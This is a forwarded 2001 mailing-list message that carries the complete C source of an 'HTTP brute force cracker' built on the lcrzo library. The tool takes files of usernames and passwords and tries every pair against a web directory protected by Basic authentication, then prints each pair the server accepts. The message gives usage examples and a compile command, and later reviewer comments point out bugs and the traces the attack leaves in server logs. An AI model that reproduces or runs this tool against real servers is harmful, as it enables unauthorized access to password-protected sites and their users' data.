____________________________________________________________________
The solution lies in the heart of humankind.
Chris Lawson
The Armadillo Group ,::////;::-. James Choate
Austin, Tx /:'///// ``::>/|/ [EMAIL PROTECTED]
www.ssz.com .', |||| `/( e\ 512-451-7087
-====~~mm-'`-```-mm --'-
--------------------------------------------------------------------
---------- Forwarded message ----------
Date: Thu, 03 May 2001 07:40:48 +0200
From: Laurent INFOS <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: HTTP brute force cracker
/************************************************************
** HTTP brute force cracker **
************************************************************
When a directory on a website is protected by a basic
authentication, we have to enter a valid username/password
to get the page.
This program tries a list of logins and passwords.
For example, the file /tmp/userlist may contain (only one word
per line):
joe
webadm
marco
For example, the file /tmp/passlist may contain:
house
horse
flour
So, if we want to access http://server:80/index.html,
we can use:
./httpgetbrute server 80 /index.html /tmp/userlist /tmp/passlist
This program prints result of the brute force.
The lcrzo library is needed:
http://www.laurentconstantin.com/us/lcrzo/ [main server]
http://go.to/laurentconstantin/us/lcrzo/ [backup server]
http://laurentconstantin.est-la.com/us/lcrzo/ [backup server]
To compile :
gcc -o httpgetbrute httpgetbrute.c -llcrzo -lpcap
This program is for educational purposes only.
*/
/* include the library headers */
#include <lcrzo.h>
#include <stdlib.h>
#include <stdio.h>
/*-------------------------------------------------------------*/
/* function declarations */
/*
 * Send one HTTP/1.0 GET for `url` to `ipl`:`port` with a Basic
 * Authorization header built from user:pass, and print the outcome
 * of that single attempt on stdout (see the definition below).
 * Returns LCRZO_ERR_OK; lcrzo_epr() presumably makes the function
 * return early with the library error code on any failure (confirm
 * against lcrzo.h).
 */
int http_get_brute(lcrzo_ipl ipl,
lcrzo_uint16 port,
lcrzo_conststring url,
lcrzo_conststring user,
lcrzo_conststring pass);
/*-------------------------------------------------------------*/
/*
 * Program entry point.
 *   argv[1]  server name or address (resolved by lcrzo_ipl_init_hs)
 *   argv[2]  TCP port
 *   argv[3]  URL path sent in the GET line
 *   argv[4]  file of usernames, one per line
 *   argv[5]  file of passwords, one per line
 * Returns 255 on a usage error, LCRZO_ERR_OK otherwise. Every lcrzo
 * call is wrapped in lcrzo_epr(), which presumably prints the error
 * and returns from main on failure -- so an unreadable file or a
 * failed connection ends the run rather than being skipped (confirm
 * the macro's semantics in lcrzo.h).
 */
int main(int argc, char *argv[])
{ lcrzo_ipl ipl;
lcrzo_uint16 port;
lcrzo_data data;
lcrzo_string user, pass;
lcrzo_int32 datasize;
int fduser, fdpass;
if ( argc<6 )
{ /* print usage */
printf("Usage: %s server_name server_port url usernamesfile passwdsfile\n",
argv[0]);
printf("Example: %s 1.2.3.5 80 /index.html /tmp/userlist /tmp/passlist\n",
argv[0]);
puts("Files userlist and passlist should contain one entry per line.");
return(255);
}
/* initialize the needed variables */
lcrzo_epr(lcrzo_ipl_init_hs(argv[1], &ipl));
/* NOTE(review): atoi() reports no error; a non-numeric or out-of-range
   port silently becomes 0 or is truncated by the 16-bit cast.
   strtol() with range checking would reject bad input instead. */
port=(lcrzo_uint16)atoi(argv[2]);
lcrzo_epr(lcrzo_fd_open_read(argv[4], &fduser));
/* read each line of the files */
/* The loop stops on the first non-OK return, which is presumably
   end-of-file but could also be a read error -- the two are not
   distinguished here. */
while ( lcrzo_fd_readm_line(fduser, LCRZO_TRUE, &data, &datasize)
== LCRZO_ERR_OK )
{ user=data;
/* Writes the terminator at index datasize; this assumes
   lcrzo_fd_readm_line allocates at least datasize+1 bytes -- TODO confirm. */
user[datasize]='\0';
/* first, try with pass=="" */
lcrzo_epr(http_get_brute(ipl, port, argv[3], user, ""));
/* then, try with pass==login */
lcrzo_epr(http_get_brute(ipl, port, argv[3], user, user));
/* then try each password of the file */
/* The password file is reopened and re-read from the start for
   every username. */
lcrzo_epr(lcrzo_fd_open_read(argv[5], &fdpass));
while ( lcrzo_fd_readm_line(fdpass, LCRZO_TRUE, &data, &datasize)
== LCRZO_ERR_OK )
{ pass=data;
/* Same datasize+1 assumption as for `user` above. */
pass[datasize]='\0';
lcrzo_epr(http_get_brute(ipl, port, argv[3], user, pass));
lcrzo_string_free(pass);
}
lcrzo_epr(lcrzo_fd_close(fdpass));
/* `user` aliases the buffer returned by lcrzo_fd_readm_line; freed here. */
lcrzo_string_free(user);
}
/* close */
lcrzo_epr(lcrzo_fd_close(fduser));
return(LCRZO_ERR_OK);
}
/*-------------------------------------------------------------*/
/*
 * Perform one authenticated GET and report the result.
 *
 * Opens a fresh TCP connection to ipl:port, sends
 *   "GET <url> HTTP/1.0\r\nAuthorization: Basic <base64(user:pass)>\r\n\r\n"
 * reads only the first response line, and:
 *   - if the status line matches "HTTP/... <code> <text>" and the code is
 *     not 401, prints "<user>\t<pass>\t-> <code> (<text>)" on stdout --
 *     note this treats every non-401 status (200, 403, 404, 500, ...)
 *     the same way, so it reports server errors and missing pages as
 *     well as accepted credentials;
 *   - if the code is 401, increments the static attempt counter and
 *     prints a progress line for the first 9 attempts and then every 10th;
 *   - if the status line does not match, dumps it as text.
 * Each call leaves one connection and one 401 in the server's access
 * log, which is what a defender would look for.
 * Returns LCRZO_ERR_OK; lcrzo_epr() presumably returns early with the
 * library error code on any failure, in which case the socket opened
 * below is not closed (confirm against lcrzo.h).
 */
int http_get_brute(lcrzo_ipl ipl,
lcrzo_uint16 port,
lcrzo_conststring url,
lcrzo_conststring user,
lcrzo_conststring pass)
{ /* counts 401 responses across all calls, for the progress message */
static lcrzo_int32 numtest=0;
lcrzo_sock sock;
lcrzo_data data;
lcrzo_int32 datasize;
/* all three are allocated by lcrzo *_initm_* calls and freed below */
lcrzo_string logpass, integerstring, errormsg;
lcrzo_int16 errornumber;
/* filled in by lcrzo_data_search_regexp; indexed as re[1], re[2] below,
   so presumably an array type -- confirm in lcrzo.h */
lcrzo_regexp re;
int ret;
/* first, we generate the base64 of login:passwd */
lcrzo_epr(lcrzo_data_initm_text(user, &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(":", datasize, &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(pass, datasize, &data, &datasize));
lcrzo_epr(lcrzo_base64_initm_data(data, datasize, &logpass));
lcrzo_data_free(data);
/* open the connection */
lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, port, &sock));
/* construct the data to send*/
/* `data` is reused for the request buffer; the previous one was freed above */
lcrzo_epr(lcrzo_data_initm_text("GET ", &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(url, datasize, &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(" HTTP/1.0\r\n", datasize,
&data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text("Authorization: Basic ", datasize,
&data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(logpass, datasize, &data, &datasize));
lcrzo_string_free(logpass);
lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
/* empty line terminates the HTTP/1.0 request; no Host header is sent */
lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
/* write data to the socket */
/*lcrzo_epr(lcrzo_data_print(data, datasize, LCRZO_PRINTTYPE_DUMP));*/
lcrzo_epr(lcrzo_sock_write(sock, data, datasize));
lcrzo_data_free(data);
/* analyze the answer */
/* Only the status line is read; headers and body are never consumed
   before the socket is closed. */
lcrzo_epr(lcrzo_sock_readm_line(&sock, LCRZO_TRUE, &data, &datasize));
/*lcrzo_epr(lcrzo_data_print(data, datasize, LCRZO_PRINTTYPE_TEXTN));*/
/* The LCRZO_FALSE, +1, -1 arguments are lcrzo search options whose
   meaning is not visible here -- see lcrzo.h. Group 1 is the status
   code, group 2 the reason phrase. */
ret=lcrzo_data_search_regexp(data, datasize, LCRZO_FALSE, +1, -1,
"HTTP/... ([0-9]+) (.+)", re);
if ( ret==LCRZO_ERR_OK )
{ /* get the error number */
lcrzo_epr(lcrzo_string_initm_range(data, re[1].startindex_positive,
re[1].endindex_positive,
&integerstring));
/* NOTE(review): atoi() result is narrowed to lcrzo_int16; the regexp
   guarantees digits only, but not a bounded length. */
errornumber=atoi(integerstring);
lcrzo_string_free(integerstring);
/* print result */
if ( errornumber!=401 )
{ /* get the error message */
lcrzo_epr(lcrzo_string_initm_range(data, re[2].startindex_positive,
re[2].endindex_positive,
&errormsg));
/* The password is written to stdout in clear text; anything that
   captures this output captures the credential. */
printf("%s\t%s\t-> %d (%s)\n", user, pass, errornumber, errormsg);
lcrzo_string_free(errormsg);
}
else
{ numtest++;
/* NOTE(review): "%ld" expects a long but numtest is lcrzo_int32; this
   is a format/argument mismatch (UB) unless lcrzo_int32 is defined as
   long -- confirm in lcrzo.h, or cast the argument to long. */
if ((!(numtest%10)) || numtest<10) printf("%ld passwd tried\n", numtest);
}
}
else
{ /* NOTE(review): "anwser" is a typo in the runtime message; left
     unchanged here because it is program output. */
puts("I could not understand this anwser :");
lcrzo_epr(lcrzo_data_print(data, datasize, LCRZO_PRINTTYPE_TEXTN));
}
lcrzo_data_free(data);
/* close */
lcrzo_epr(lcrzo_sock_close(sock));
return(LCRZO_ERR_OK);
}